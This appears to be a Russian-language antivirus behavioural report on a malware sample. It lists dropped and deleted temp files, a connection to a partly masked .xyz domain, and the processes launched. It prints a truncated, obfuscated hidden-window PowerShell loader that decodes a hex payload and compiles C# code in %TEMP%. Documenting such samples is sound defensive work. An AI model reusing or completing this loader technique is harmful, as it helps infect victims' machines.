Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden function c5fcb {param($oadc5a)$o8e7adc='fa6447';$ve8dc22='';for ($i=0; $i -lt $oadc5a.length;$i+=2){$f9fffe4=[convert]::ToByte($oadc5a.Substring($i,2),16);$ve8dc22+=[char]...
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\zvyq17mg.0.cs
- %TEMP%\zvyq17mg.cmdline
- %TEMP%\zvyq17mg.out
- %TEMP%\cscc640.tmp
- %TEMP%\resc641.tmp
- %TEMP%\zvyq17mg.dll
Удаляет следующие файлы
- %TEMP%\resc641.tmp
- %TEMP%\cscc640.tmp
- %TEMP%\zvyq17mg.pdb
- %TEMP%\zvyq17mg.dll
- %TEMP%\zvyq17mg.out
- %TEMP%\zvyq17mg.cmdline
- %TEMP%\zvyq17mg.0.cs
Сетевая активность
TCP
- 'di###tmobil.xyz':443
UDP
- DNS ASK di###tmobil.xyz
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden function c5fcb {param($oadc5a)$o8e7adc='fa6447';$ve8dc22='';for ($i=0; $i -lt $oadc5a.length;$i+=2){$f9fffe4=[convert]::ToByte($oadc5a.Substring($i,2),16);$ve8dc22+=[char]...' (со скрытым окном)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\zvyq17mg.cmdline"' (со скрытым окном)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RESC641.tmp" "%TEMP%\CSCC640.tmp"' (со скрытым окном)
Запускает на исполнение
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\zvyq17mg.cmdline"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RESC641.tmp" "%TEMP%\CSCC640.tmp"
